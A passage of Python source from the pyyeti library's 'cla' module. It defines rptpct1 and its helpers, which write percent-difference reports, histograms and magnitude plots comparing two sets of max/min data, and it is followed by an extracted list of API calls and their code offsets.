# total_percent_10 will either be 0 or 1000:
# - 0 if all % diffs are "n/a"
# - 1000 otherwise
total_percent_10 = np.round(pctcount[:, 2].sum() * 10)
last = -1.0
for pdiff in [1, 2, 5, 10, 15, 20, 25, 50, 100, 500]:
pvdiff = abs(pctcount[:, 0]) <= pdiff
num = pctcount[pvdiff, 2].sum()
if num > last:
s.append(f" {num:.1f}% of values are within {pdiff}%\n")
if np.round(num * 10) == total_percent_10:
break
last = num
pct = pctinfo["pct"]
n = len(pct)
if n == 0:
s.append(
"\n % Diff Statistics: [Min, Max, Mean, StdDev]"
" = [n/a, n/a, n/a, n/a]\n"
)
else:
stddev = 0.0 if n <= 1 else pct.std(ddof=1)
s.append(
"\n % Diff Statistics: [Min, Max, Mean, StdDev]"
f" = [{pct.min():.2f}, {pct.max():.2f}, {pct.mean():.4f}, {stddev:.4f}]\n"
)
return "".join(s)
def _proc_pct(
ext1,
ext2,
filterval,
magpct_filterval,
*,
names,
mxmn1,
comppv,
mxmn_b,
ismax,
histogram_inc,
prtbads,
flagbads,
numform,
valhdr,
maxhdr,
minhdr,
absmhdr,
pdhdr,
nastring,
doabsmax,
shortabsmax,
print_info,
):
# handle magpct stuff here:
mag = ext1[comppv], ext2[comppv]
if magpct_filterval is not None and len(magpct_filterval) > 1:
magfilt = magpct_filterval[comppv]
else:
magfilt = magpct_filterval
pv = comppv.copy()
pct, spct = _get_pct_diff(
ext1,
ext2,
filterval,
pv,
nastring,
mxmn_b=mxmn_b,
ismax=ismax,
flagbads=flagbads,
)
pct_ret = pct[pv]
hsto = ytools.histogram(pct_ret, histogram_inc)
# for trimming down if prtbad set:
prtpv = _get_badpv(pct, pv, *prtbads, True)
pctlen = max(len(pdhdr), len(max(spct, key=len)))
sformatpd = f"{{:{pctlen}}}"
# for writer.formheader:
numlen = max(13, len(max(names, key=len)), len(numform.format(np.pi)))
if not doabsmax:
print_info.headers1.extend([*names, ""])
print_info.headers2.extend([valhdr, valhdr, pdhdr])
print_info.formats.extend([numform, numform, sformatpd])
print_info.printargs.extend([ext1, ext2, spct])
print_info.widths.extend([numlen, numlen, pctlen])
print_info.seps.extend([4, 2, 2])
print_info.justs.extend(["c", "c", "c"])
elif shortabsmax:
print_info.headers1.extend([*names, ""])
print_info.headers2.extend([absmhdr, absmhdr, pdhdr])
print_info.formats.extend([numform, numform, sformatpd])
print_info.printargs.extend([ext1, ext2, spct])
print_info.widths.extend([numlen, numlen, pctlen])
print_info.seps.extend([4, 2, 2])
print_info.justs.extend(["c", "c", "c"])
else:
print_info.headers1.extend([names[0], names[0], names[0], names[1], ""])
print_info.headers2.extend([maxhdr, minhdr, absmhdr, absmhdr, pdhdr])
print_info.formats.extend([numform, numform, numform, numform, sformatpd])
print_info.printargs.extend([mxmn1[:, 0], mxmn1[:, 1], ext1, ext2, spct])
print_info.widths.extend([numlen, numlen, numlen, numlen, pctlen])
print_info.seps.extend([4, 2, 2, 2, 2])
print_info.justs.extend(["c", "c", "c", "c", "c"])
return dict(
pct=pct_ret, spct=spct, hsto=hsto, prtpv=prtpv, mag=mag, magfilt=magfilt
)
def _figure_on(name, doabsmax, show_figures):
figsize = [8.5, 11.0]
if doabsmax:
figsize[1] /= 3.0
if show_figures:
plt.figure(name, figsize=figsize)
plt.clf()
else:
plt.figure(figsize=figsize)
def _figure_off(show_figures):
if not show_figures:
plt.close()
def _prep_subplot(pctinfo, sp):
if "mx" in pctinfo:
# if not just doing absmax
if sp > 311:
plt.subplot(sp, sharex=plt.gca())
else:
plt.subplot(sp)
def _plot_magpct(
pctinfo,
names,
desc,
doabsmax,
filename,
magpct_options,
use_range,
maxhdr,
minhdr,
absmhdr,
show_figures,
tight_layout_args,
):
ptitle = f"{desc} - {{}} Comparison vs Magnitude"
xl = f"{names[1]} Magnitude"
yl = f"% Diff of {names[0]} vs {names[1]}"
_figure_on("Magpct - " + desc, doabsmax, show_figures)
try:
for lbl, hdr, sp, ismax in (
("mx", maxhdr, 311, True),
("mn", minhdr, 312, False),
("amx", absmhdr, 313, True),
):
_prep_subplot(pctinfo, sp)
if lbl in pctinfo:
if use_range:
ref = pctinfo["amx"]["mag"][1]
else:
ref = None
magpct(
pctinfo[lbl]["mag"][0],
pctinfo[lbl]["mag"][1],
Ref=ref,
ismax=ismax,
filterval=pctinfo[lbl]["magfilt"],
**magpct_options,
)
plt.title(ptitle.format(hdr))
plt.xlabel(xl)
plt.ylabel(yl)
plt.grid(True)
plt.tight_layout(**tight_layout_args)
if isinstance(filename, str):
plt.savefig(filename + ".magpct.png")
finally:
_figure_off(show_figures)
def _plot_histogram(
pctinfo,
names,
desc,
doabsmax,
filename,
histogram_inc,
maxhdr,
minhdr,
absmhdr,
show_figures,
tight_layout_args,
):
ptitle = f"{desc} - {{}} Comparison Histogram"
xl = f"% Diff of {names[0]} vs {names[1]}"
yl = "Percent Occurrence (%)"
_figure_on("Histogram - " + desc, doabsmax, show_figures)
try:
for lbl, hdr, sp in (
("mx", maxhdr, 311),
("mn", minhdr, 312),
("amx", absmhdr, 313),
):
_prep_subplot(pctinfo, sp)
if lbl in pctinfo:
width = histogram_inc
x = pctinfo[lbl]["hsto"][:, 0]
y = pctinfo[lbl]["hsto"][:, 2]
colors = ["b"] * len(x)
ax = abs(x)
pv1 = ((ax > 5) & (ax <= 10)).nonzero()[0]
pv2 = (ax > 10).nonzero()[0]
for pv, c in ((pv1, "m"), (pv2, "r")):
for i in pv:
colors[i] = c
plt.bar(x, y, width=width, color=colors, align="center")
plt.title(ptitle.format(hdr))
plt.xlabel(xl)
plt.ylabel(yl)
x = abs(max(plt.xlim(), key=abs))
if x < 5:
plt.xlim(-5, 5)
plt.grid(True)
plt.tight_layout(**tight_layout_args)
if isinstance(filename, str):
plt.savefig(filename + ".histogram.png")
finally:
_figure_off(show_figures)
def rptpct1(
mxmn1,
mxmn2,
filename,
*,
title="PERCENT DIFFERENCE REPORT",
names=("Self", "Reference"),
desc=None,
filterval=None,
labels=None,
units=None,
ignorepv=None,
uf_reds=None,
use_range=True,
numform=None,
prtbad=None,
prtbadh=None,
prtbadl=None,
flagbad=None,
flagbadh=None,
flagbadl=None,
dohistogram=True,
histogram_inc=1.0,
domagpct=True,
magpct_options=None,
doabsmax=False,
shortabsmax=False,
roundvals=-1,
rowhdr="Row",
deschdr="Description",
maxhdr="Maximum",
minhdr="Minimum",
absmhdr="Abs-Max",
perpage=-1,
tight_layout_args=None,
show_figures=False,
align_by_label=True,
):
"""
Write a percent difference report between 2 sets of max/min data
Parameters
----------
mxmn1 : 2d array_like or SimpleNamespace
The max/min data to compare to the `mxmn2` set. If 2-column
array_like, its columns are: [max, min]. If SimpleNamespace,
it must be as defined in :class:`DR_Results` and have these
members:
.. code-block:: none
.ext = [max, min]
.drminfo = SimpleNamespace which has (at least):
.desc = one line description of category
.filterval = the filter value; (see `filterval`
description below)
.labels = a list of descriptions; one per row
.ignorepv = these rows will get 'n/a' for % diff
.units = string with units
.uf_reds = uncertainty factors
Note that the inputs `desc`, `labels`, etc, override the
values above.
mxmn2 : 2d array_like or SimpleNamespace
The reference set of max/min data. Format is the same as
`mxmn1`.
.. note::
If both `mxmn1` and `mxmn2` are SimpleNamespaces and have
the ``.drminfo.labels`` attribute, this routine will, by
default, use the labels to align the data sets for
comparison. To prevent this, set the `align_by_label`
parameter to False.
filename : string or file_like or 1 or None
Either a name of a file, or is a file_like object as returned
by :func:`open` or :class:`io.StringIO`. Input as integer 1 to
write to stdout. Can also be the name of a directory or None;
in these cases, a GUI is opened for file selection.
title : string; must be named; optional
Title for the report
names : list/tuple; must be named; optional
Two (short) strings identifying the two sets of data
desc : string or None; must be named; optional
A one line description of the table. Overrides
`mxmn1.drminfo.desc`. If neither are input,
'No description provided' is used.
filterval : scalar, 1d array_like or None; must be named; optional
Numbers with absolute value <= than `filterval` will get a
'n/a' % diff. If vector, length must match number of rows in
`mxmn1` and `mxmn2` data. Overrides `mxmn1.drminfo.filterval`.
If neither are input, `filterval` is set to 1.e-6.
labels : list or None; must be named; optional
A list of strings briefly describing each row. Overrides
`mxmn1.drminfo.labels`. If neither are input,
``['Row 1','Row 2',...]`` is used.
units : string or None; must be named; optional
Specifies the units. Overrides `mxmn1.drminfo.units`. If
neither are input, 'Not specified' is used.
ignorepv : 1d array or None; must be named; optional
0-offset index vector specifying which rows of `mxmn1` to
ignore (they get the 'n/a' % diff). Overrides
`mxmn1.drminfo.ignorepv`. If neither are input, no rows are
ignored (though `filterval` is still used).
.. note::
`ignorepv` applies *before* any alignment by labels is
done (when `align_by_label` is True, which is the
default).
uf_reds : 1d array or None; must be named; optional
Uncertainty factors: [rigid, elastic, dynamic, static].
Overrides `mxmn1.drminfo.uf_reds`. If neither is input,
'Not specified' is used.
use_range : bool; must be named, optional
If True, the denominator of the % diff calc for both the max
& min for each row is the absolute maximum of the reference
max & min for that row. If False, the denominator is the
applicable reference max or min. A quick example shows why
``use_range=True`` might be useful:
.. code-block:: none
If [max1, min1] = [12345, -10] and
[max2, min2] = [12300, 50]
Then:
% diff = [0.37%, 0.49%] if use_range is True
% diff = [0.37%, 120.00%] if use_range is False
Note that the sign of the % diff is defined such that a
positive % diff means an exceedance: where ``max1 > max2`` or
``min1 < min2``.
`use_range` is ignored if `doabsmax` is True.
numform : string or None; must be named; optional
Format of the max & min numbers. If None, it is set internally
to be 13 chars wide and depends on the range of numbers to
print:
- if range is "small", numform='{:13.xf}' where "x" ranges
from 0 to 7
- if range is "large", numform='{:13.6e}'
prtbad : scalar or None; must be named; optional
Only print rows where ``abs(%diff) > prtbad``. For example, to
print rows off by more than 5%, use ``prtbad=5``. `prtbad`
takes precedence over `prtbadh` and `prtbadl`.
prtbadh : scalar or None; must be named; optional
Only print rows where ``%diff > prtbadh``. Handy for showing
just the exceedances. `prtbadh` takes precedence over
`prtbadl`.
prtbadl : scalar or None; must be named; optional
Only print rows where ``%diff < prtbadl``. Handy for showing
where reference rows are higher.
flagbad : scalar or None; must be named; optional
Flag % diffs where ``abs(%diff) > flagbad``. Works similar to
`prtbad`. The flag is an asterisk (*).
flagbadh : scalar or None; must be named; optional
Flag % diffs where ``%diff > flagbadh``. Works similar to
`prtbadh`. Handy for flagging exceedances. `flagbadh` takes
precedence over `flagbadl`.
flagbadl : scalar or None; must be named; optional
Flag % diffs where ``%diff < flagbadl``. Works similar to
`prtbadl`.
dohistogram : bool; must be named; optional
If True, plot the histograms. Plots will be written to
"`filename`.histogram.png".
histogram_inc : scalar; must be named; optional
The histogram increment; defaults to 1.0 (for 1%).
domagpct : bool; must be named; optional
If True, plot the percent differences versus magnitude via
:func:`magpct`. Plots will be written to
"`filename`.magpct.png". Filtering for the "magpct" plot is
controlled by the ``magpct_options['filterval']`` and
``magpct_options['symlogy']`` options. By default, all percent
differences are shown, but the larger values (according to the
`filterval` filter) are emphasized by using a mixed linear/log
y-axis. The percent differences for the `ignorepv` rows are
not plotted.
magpct_options : None or dict; must be named; optional
If None, it is internally reset to::
magpct_options = {'filterval': 'filterval'}
Use this parameter to provide any options to :func:`magpct`
but note that the `filterval` option for :func:`magpct` is
treated specially. Here, in addition to any of the values that
:func:`magpct` accepts, it can also be set to the string
"filterval" as in the default case shown above. In that case,
``magpct_options['filterval']`` gets internally reset to the
initial value of `filterval` (which is None by default).
.. note::
The call to :func:`magpct` is *after* applying `ignorepv`
and doing any data aligning by labels.
.. note::
The two filter value options (`filterval` and
``magpct_options['filterval']``) have different defaults:
None and 'filterval`, respectively. They also differ on how
the ``None`` setting is used: for `filterval`, None is
replaced by 1.e-6 while for `magpct_filterval`, None means
that the "magpct" plot will not have any filters applied at
all.
.. note::
The above means that, if you accept the default values for
`filterval` and for ``magpct_options['filterval']``, then
tables and the histogram plots will use a `filterval` of
1.e-6 while the "magpct" plots will use no filter (it
compares everything except perfect zeros).
doabsmax : bool; must be named; optional
If True, compare only absolute maximums.
shortabsmax : bool; must be named; optional
If True, set ``doabsmax=True`` and do not print the max1 and
min1 columns.
roundvals : integer; must be named; optional
Round max & min numbers at specified decimal. If negative, no
rounding.
rowhdr : string; must be named; optional
Header for row number column
deschdr : string; must be named; optional
Header for description column
maxhdr : string; must be named; optional
Header for the column 1 data
minhdr : string; must be named; optional
Header for the column 2 data
absmhdr : string; must be named; optional
Header for abs-max column
perpage : integer; must be named; optional
The number of lines to write perpage. If < 1, there is no
limit (one page).
tight_layout_args : dict or None; must be named; optional
Arguments for :func:`matplotlib.pyplot.tight_layout`. If None,
defaults to ``{'pad': 3.0}``.
show_figures : bool; must be named; optional
If True, plot figures will be displayed on the screen for
interactive viewing. Warning: there may be many figures.
align_by_label : bool; must be named; optional
If True, use labels to align the two sets of data for
comparison. See note above under the `mxmn2` option.
Returns
-------
pdiff_info : dict
Dictionary with 'amx' (abs-max), 'mx' (max), and 'mn' keys:
.. code-block:: none
<class 'dict'>[n=3]
'amx': <class 'dict'>[n=5]
'hsto' : float64 ndarray 33 elems: (11, 3)
'mag' : [n=2]: (float64 ndarray: (100,), ...
'pct' : float64 ndarray 100 elems: (100,)
'prtpv': bool ndarray 100 elems: (100,)
'spct' : [n=100]: [' -2.46', ' -1.50', ...
'mn' : <class 'dict'>[n=5]
'hsto' : float64 ndarray 33 elems: (11, 3)
'mag' : [n=2]: (float64 ndarray: (100,), ...
'pct' : float64 ndarray 100 elems: (100,)
'prtpv': bool ndarray 100 elems: (100,)
'spct' : [n=100]: [' 1.55', ' 1.53', ...
'mx' : <class 'dict'>[n=5]
'hsto' : float64 ndarray 27 elems: (9, 3)
'mag' : [n=2]: (float64 ndarray: (100,), ...
'pct' : float64 ndarray 100 elems: (100,)
'prtpv': bool ndarray 100 elems: (100,)
'spct' : [n=100]: [' -2.46', ' -1.50', ...
Where:
.. code-block:: none
'hsto' : output of :func:`histogram`: [center, count, %]
'mag' : inputs to :func:`magpct`
'pct' : percent differences
'prtpv' : rows to print partition vector
'spct' : string version of 'pct'
Examples
--------
>>> import numpy as np
>>> from pyyeti import cla
>>> ext1 = [[120.0, -8.0],
... [8.0, -120.0]]
>>> ext2 = [[115.0, -5.0],
... [10.0, -125.0]]
Run :func:`rptpct1` multiple times to get a more complete picture
of all the output (the table is very wide). Also, the plots will
be turned off for this example.
First, the header:
>>> opts = {'domagpct': False, 'dohistogram': False}
>>> dct = cla.rptpct1(ext1, ext2, 1, **opts) # doctest: +ELLIPSIS
PERCENT DIFFERENCE REPORT
<BLANKLINE>
Description: No description provided
Uncertainty: Not specified
Units: Not specified
Filter: 1e-06
Notes: % Diff = +/- abs(Self-Reference)/max(abs(Reference...
Sign set such that positive % differences indicate...
Date: ...
...
Then, the max/min/absmax percent difference table in 3 calls:
>>> dct = cla.rptpct1(ext1, ext2, 1, **opts) # doctest: +ELLIPSIS
PERCENT DIFFERENCE REPORT
...
Self Reference ...
Row Description Maximum Maximum % Diff ...
------- ----------- ------------- ------------- ------- ...
1 Row 1 120.00000 115.00000 4.35 ...
2 Row 2 8.00000 10.00000 -1.60 ...
...
>>> dct = cla.rptpct1(ext1, ext2, 1, **opts) # doctest: +ELLIPSIS
PERCENT DIFFERENCE REPORT
...
... Self Reference ...
Row Description ... Minimum Minimum % Diff ...
------- ----------- ...------------- ------------- ------- ...
1 Row 1 ... -8.00000 -5.00000 2.61 ...
2 Row 2 ... -120.00000 -125.00000 -4.00 ...
...
>>> dct = cla.rptpct1(ext1, ext2, 1, **opts) # doctest: +ELLIPSIS
PERCENT DIFFERENCE REPORT
...
... Self Reference
Row Description ... Abs-Max Abs-Max % Diff
------- ----------- ...------------- ------------- -------
1 Row 1 ... 120.00000 115.00000 4.35
2 Row 2 ... 120.00000 125.00000 -4.00
...
Finally, the histogram summaries:
>>> dct = cla.rptpct1(ext1, ext2, 1, **opts) # doctest: +ELLIPSIS
PERCENT DIFFERENCE REPORT
...
No description provided - Maximum Comparison Histogram
<BLANKLINE>
% Diff Count Percent
-------- -------- -------
-2.00 1 50.00
4.00 1 50.00
<BLANKLINE>
0.0% of values are within 1%
50.0% of values are within 2%
100.0% of values are within 5%
<BLANKLINE>
% Diff Statistics: [Min, Max, Mean, StdDev] = [-1.60, 4.35,...
<BLANKLINE>
<BLANKLINE>
No description provided - Minimum Comparison Histogram
<BLANKLINE>
% Diff Count Percent
-------- -------- -------
-4.00 1 50.00
3.00 1 50.00
<BLANKLINE>
0.0% of values are within 1%
100.0% of values are within 5%
<BLANKLINE>
% Diff Statistics: [Min, Max, Mean, StdDev] = [-4.00, 2.61,...
<BLANKLINE>
<BLANKLINE>
No description provided - Abs-Max Comparison Histogram
<BLANKLINE>
% Diff Count Percent
-------- -------- -------
-4.00 1 50.00
4.00 1 50.00
<BLANKLINE>
0.0% of values are within 1%
100.0% of values are within 5%
<BLANKLINE>
% Diff Statistics: [Min, Max, Mean, StdDev] = [-4.00, 4.35,...
"""
if tight_layout_args is None:
tight_layout_args = {"pad": 3.0}
if magpct_options is None:
magpct_options = {"filterval": "filterval"}
else:
magpct_options = magpct_options.copy()
# magpct_options['filterval'] get special treatment:
magpct_filterval = magpct_options["filterval"]
del magpct_options["filterval"]
if isinstance(magpct_filterval, str):
if magpct_filterval != "filterval":
raise ValueError(
"``magpct_options['filterval']`` is an invalid "
f"string: {magpct_filterval!r} (can only "
"be 'filterval' if a string)"
)
# copy the initial `filterval` setting:
magpct_filterval = filterval
infovars = (
"desc",
"filterval",
"magpct_filterval",
"labels",
"units",
"ignorepv",
"uf_reds",
)
dct = locals()
infodct = {n: dct[n] for n in infovars}
del dct
# check mxmn1:
if isinstance(mxmn1, SimpleNamespace):
sns = mxmn1.drminfo
for key, value in infodct.items():
if value is None:
infodct[key] = getattr(sns, key, None)
del sns
mxmn1 = mxmn1.ext
else:
mxmn1 = np.atleast_2d(mxmn1)
row_number = np.arange(1, mxmn1.shape[0] + 1)
# check mxmn2:
if isinstance(mxmn2, SimpleNamespace) and getattr(mxmn2, "drminfo", None):
labels2 = mxmn2.drminfo.labels
mxmn2 = mxmn2.ext
if align_by_label:
# use labels and labels2 to align data; this is in case
# the two sets of results recover some of the same items,
# but not all
mxmn1, mxmn2, row_number = _align_mxmn(
mxmn1, mxmn2, labels2, row_number, infodct
)
else:
mxmn2 = np.atleast_2d(mxmn2)
desc = infodct["desc"]
if desc is None:
desc = "No description provided"
R = mxmn1.shape[0]
if R != mxmn2.shape[0]:
raise ValueError(
f"`mxmn1` and `mxmn2` have a different number of rows: "
f"{R} vs {mxmn2.shape[0]} for category with `desc` = {desc}"
)
filterval = infodct["filterval"]
magpct_filterval = infodct["magpct_filterval"]
labels = infodct["labels"]
units = infodct["units"]
ignorepv = infodct["ignorepv"]
uf_reds = infodct["uf_reds"]
del infodct
if filterval is None:
filterval = 1.0e-6
filterval = _proc_filterval(filterval, R, "filterval")
magpct_filterval = _proc_filterval(
magpct_filterval, R, "magpct_options['filterval']"
)
if labels is None:
labels = [f"Row {i + 1:6d}" for i in range(R)]
elif len(labels) != R:
raise ValueError(
"length of `labels` does not match number"
f" of rows in `mxmn1`: {len(labels)} vs {R} for "
f"category with `desc` = {desc}"
)
if units is None:
units = "Not specified"
if numform is None:
numform = _get_numform(mxmn1)
pdhdr = "% Diff"
nastring = "n/a "
comppv = np.ones(R, bool)
if ignorepv is not None:
comppv[ignorepv] = False
# for row labels:
w = max(11, len(max(labels, key=len)))
frm = f"{{:{w}}}"
# start preparing for writer.formheader:
print_info = SimpleNamespace(
headers1=["", ""],
headers2=[rowhdr, deschdr],
formats=["{:7d}", frm],
printargs=[row_number, labels],
widths=[7, w],
seps=[0, 2],
justs=["c", "l"],
)
if shortabsmax:
doabsmax = True
if doabsmax:
use_range = False
if roundvals > -1:
mxmn1 = np.round(mxmn1, roundvals)
mxmn2 = np.round(mxmn2, roundvals)
prtbads = (prtbad, prtbadh, prtbadl)
flagbads = (flagbad, flagbadh, flagbadl)
# compute percent differences
pctinfo = {}
kwargs = dict(
names=names,
mxmn1=mxmn1,
comppv=comppv,
histogram_inc=histogram_inc,
numform=numform,
prtbads=prtbads,
flagbads=flagbads,
maxhdr=maxhdr,
minhdr=minhdr,
absmhdr=absmhdr,
pdhdr=pdhdr,
nastring=nastring,
doabsmax=doabsmax,
shortabsmax=shortabsmax,
print_info=print_info,
)
with warnings.catch_warnings():
warnings.filterwarnings("ignore", r"All-NaN (slice|axis) encountered")
mx1 = np.nanmax(abs(mxmn1), axis=1)
mx2 = np.nanmax(abs(mxmn2), axis=1)
if not doabsmax:
max1, min1 = mxmn1[:, 0], mxmn1[:, 1]
max2, min2 = mxmn2[:, 0], mxmn2[:, 1]
mxmn_b = mxmn2 if use_range else None
prtpv = np.zeros(R, bool)
for i in zip(
("mx", "mn", "amx"),
(max1, min1, mx1),
(max2, min2, mx2),
(True, False, True),
(maxhdr, minhdr, absmhdr),
):
lbl, ext1, ext2, ismax, valhdr = i
pctinfo[lbl] = _proc_pct(
ext1,
ext2,
filterval,
magpct_filterval,
mxmn_b=mxmn_b,
ismax=ismax,
valhdr=valhdr,
**kwargs,
)
prtpv |= pctinfo[lbl]["prtpv"]
prtpv &= comppv
else:
pctinfo["amx"] = _proc_pct(
mx1,
mx2,
filterval,
magpct_filterval,
mxmn_b=None,
ismax=True,
valhdr=absmhdr,
**kwargs,
)
prtpv = pctinfo["amx"]["prtpv"]
hu, frm = writer.formheader(
[print_info.headers1, print_info.headers2],
print_info.widths,
print_info.formats,
sep=print_info.seps,
just=print_info.justs,
)
# format page header:
misc = _get_filtline(filterval) + _get_noteline(use_range, names, prtbads, flagbads)
hdrs = _get_rpt_headers(desc=desc, uf_reds=uf_reds, units=units, misc=misc)
header = title + "\n\n" + hdrs + "\n"
imode = plt.isinteractive()
plt.interactive(show_figures)
try:
if domagpct:
_plot_magpct(
pctinfo,
names,
desc,
doabsmax,
filename,
magpct_options,
use_range,
maxhdr,
minhdr,
absmhdr,
show_figures,
tight_layout_args,
)
if dohistogram:
_plot_histogram(
pctinfo,
names,
desc,
doabsmax,
filename,
histogram_inc,
maxhdr,
minhdr,
absmhdr,
show_figures,
tight_layout_args,
)
finally:
plt.interactive(imode)
# write results
@ytools.write_text_file
def _wtcmp(f, header, hu, frm, printargs, perpage, prtpv, pctinfo, desc):
prtpv = prtpv.nonzero()[0]
if perpage < 1:
# one additional in case size is zero
perpage = prtpv.size + 1
pages = (prtpv.size + perpage - 1) // perpage
if prtpv.size < len(printargs[0]):
for i, item in enumerate(printargs):
printargs[i] = [item[j] for j in prtpv]
tabhead = header + hu
pager = "\n" # + chr(12)
for p in range(pages):
if p > 0:
f.write(pager)
f.write(tabhead)
b = p * perpage
e = b + perpage
writer.vecwrite(f, frm, *printargs, so=slice(b, e))
f.write(pager)
for lbl, hdr in zip(("mx", "mn", "amx"), (maxhdr, minhdr, absmhdr)):
if lbl in pctinfo:
f.write(_get_histogram_str(desc, hdr, pctinfo[lbl]))
_wtcmp(
filename, header, hu, frm, print_info.printargs, perpage, prtpv, pctinfo, desc
)
return pctinfo
|
[
"matplotlib.pyplot.grid",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.interactive",
"pyyeti.writer.vecwrite",
"numpy.arange",
"numpy.atleast_2d",
"pyyeti.locate.list_intersect",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.close",
"pyyeti.writer.formheader",
"io.StringIO",
"pyyeti.locate.index2bool",
"numpy.round",
"matplotlib.pyplot.savefig",
"numpy.ones",
"types.SimpleNamespace",
"matplotlib.pyplot.isinteractive",
"matplotlib.pyplot.gca",
"pyyeti.ytools.histogram",
"matplotlib.pyplot.xlim",
"warnings.filterwarnings",
"numpy.set_printoptions",
"numpy.atleast_1d",
"matplotlib.pyplot.clf",
"warnings.catch_warnings",
"matplotlib.pyplot.figure",
"numpy.zeros",
"matplotlib.pyplot.bar",
"matplotlib.pyplot.tight_layout",
"matplotlib.pyplot.subplot"
] |
[((514, 548), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'legacy': '"""1.13"""'}), "(legacy='1.13')\n", (533, 548), True, 'import numpy as np\n'), ((933, 953), 'numpy.atleast_1d', 'np.atleast_1d', (['value'], {}), '(value)\n', (946, 953), True, 'import numpy as np\n'), ((7410, 7450), 'pyyeti.ytools.histogram', 'ytools.histogram', (['pct_ret', 'histogram_inc'], {}), '(pct_ret, histogram_inc)\n', (7426, 7450), False, 'from pyyeti import ytools, locate, writer\n'), ((29772, 29804), 'numpy.arange', 'np.arange', (['(1)', '(mxmn1.shape[0] + 1)'], {}), '(1, mxmn1.shape[0] + 1)\n', (29781, 29804), True, 'import numpy as np\n'), ((31580, 31596), 'numpy.ones', 'np.ones', (['R', 'bool'], {}), '(R, bool)\n', (31587, 31596), True, 'import numpy as np\n'), ((31810, 31984), 'types.SimpleNamespace', 'SimpleNamespace', ([], {'headers1': "['', '']", 'headers2': '[rowhdr, deschdr]', 'formats': "['{:7d}', frm]", 'printargs': '[row_number, labels]', 'widths': '[7, w]', 'seps': '[0, 2]', 'justs': "['c', 'l']"}), "(headers1=['', ''], headers2=[rowhdr, deschdr], formats=[\n '{:7d}', frm], printargs=[row_number, labels], widths=[7, w], seps=[0, \n 2], justs=['c', 'l'])\n", (31825, 31984), False, 'from types import SimpleNamespace\n'), ((34068, 34217), 'pyyeti.writer.formheader', 'writer.formheader', (['[print_info.headers1, print_info.headers2]', 'print_info.widths', 'print_info.formats'], {'sep': 'print_info.seps', 'just': 'print_info.justs'}), '([print_info.headers1, print_info.headers2], print_info.\n widths, print_info.formats, sep=print_info.seps, just=print_info.justs)\n', (34085, 34217), False, 'from pyyeti import ytools, locate, writer\n'), ((34511, 34530), 'matplotlib.pyplot.isinteractive', 'plt.isinteractive', ([], {}), '()\n', (34528, 34530), True, 'import matplotlib.pyplot as plt\n'), ((34535, 34564), 'matplotlib.pyplot.interactive', 'plt.interactive', (['show_figures'], {}), '(show_figures)\n', (34550, 34564), True, 'import matplotlib.pyplot as plt\n'), ((1586, 1618), 'pyyeti.locate.index2bool', 'locate.index2bool', (['value', 'oldlen'], {}), '(value, oldlen)\n', (1603, 1618), False, 'from pyyeti import ytools, locate, writer\n'), ((1861, 1910), 'pyyeti.locate.list_intersect', 'locate.list_intersect', (["infodct['labels']", 'labels2'], {}), "(infodct['labels'], labels2)\n", (1882, 1910), False, 'from pyyeti import ytools, locate, writer\n'), ((5512, 5522), 'io.StringIO', 'StringIO', ([], {}), '()\n', (5520, 5522), False, 'from io import StringIO\n'), ((5537, 5603), 'pyyeti.writer.vecwrite', 'writer.vecwrite', (['f', '""" {:8.2f} {:8.0f} {:7.2f}\n"""', 'pctcount'], {}), "(f, ' {:8.2f} {:8.0f} {:7.2f}\\n', pctcount)\n", (5552, 5603), False, 'from pyyeti import ytools, locate, writer\n'), ((9302, 9335), 'matplotlib.pyplot.figure', 'plt.figure', (['name'], {'figsize': 'figsize'}), '(name, figsize=figsize)\n', (9312, 9335), True, 'import matplotlib.pyplot as plt\n'), ((9344, 9353), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (9351, 9353), True, 'import matplotlib.pyplot as plt\n'), ((9372, 9399), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': 'figsize'}), '(figsize=figsize)\n', (9382, 9399), True, 'import matplotlib.pyplot as plt\n'), ((9466, 9477), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (9475, 9477), True, 'import matplotlib.pyplot as plt\n'), ((10880, 10917), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '(**tight_layout_args)\n', (10896, 10917), True, 'import matplotlib.pyplot as plt\n'), ((12411, 12448), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '(**tight_layout_args)\n', (12427, 12448), True, 'import matplotlib.pyplot as plt\n'), ((29734, 29754), 'numpy.atleast_2d', 'np.atleast_2d', (['mxmn1'], {}), '(mxmn1)\n', (29747, 29754), True, 'import numpy as np\n'), ((30311, 30331), 'numpy.atleast_2d', 'np.atleast_2d', (['mxmn2'], {}), '(mxmn2)\n', (30324, 30331), True, 'import numpy as np\n'), ((32165, 32191), 'numpy.round', 'np.round', (['mxmn1', 'roundvals'], {}), '(mxmn1, roundvals)\n', (32173, 32191), True, 'import numpy as np\n'), ((32208, 32234), 'numpy.round', 'np.round', (['mxmn2', 'roundvals'], {}), '(mxmn2, roundvals)\n', (32216, 32234), True, 'import numpy as np\n'), ((32797, 32822), 'warnings.catch_warnings', 'warnings.catch_warnings', ([], {}), '()\n', (32820, 32822), False, 'import warnings\n'), ((32832, 32901), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""', '"""All-NaN (slice|axis) encountered"""'], {}), "('ignore', 'All-NaN (slice|axis) encountered')\n", (32855, 32901), False, 'import warnings\n'), ((33166, 33183), 'numpy.zeros', 'np.zeros', (['R', 'bool'], {}), '(R, bool)\n', (33174, 33183), True, 'import numpy as np\n'), ((35333, 35355), 'matplotlib.pyplot.interactive', 'plt.interactive', (['imode'], {}), '(imode)\n', (35348, 35355), True, 'import matplotlib.pyplot as plt\n'), ((6093, 6111), 'numpy.round', 'np.round', (['(num * 10)'], {}), '(num * 10)\n', (6101, 6111), True, 'import numpy as np\n'), ((9664, 9679), 'matplotlib.pyplot.subplot', 'plt.subplot', (['sp'], {}), '(sp)\n', (9675, 9679), True, 'import matplotlib.pyplot as plt\n'), ((10857, 10871), 'matplotlib.pyplot.grid', 'plt.grid', (['(True)'], {}), '(True)\n', (10865, 10871), True, 'import matplotlib.pyplot as plt\n'), ((10968, 11005), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(filename + '.magpct.png')"], {}), "(filename + '.magpct.png')\n", (10979, 11005), True, 'import matplotlib.pyplot as plt\n'), ((12388, 12402), 'matplotlib.pyplot.grid', 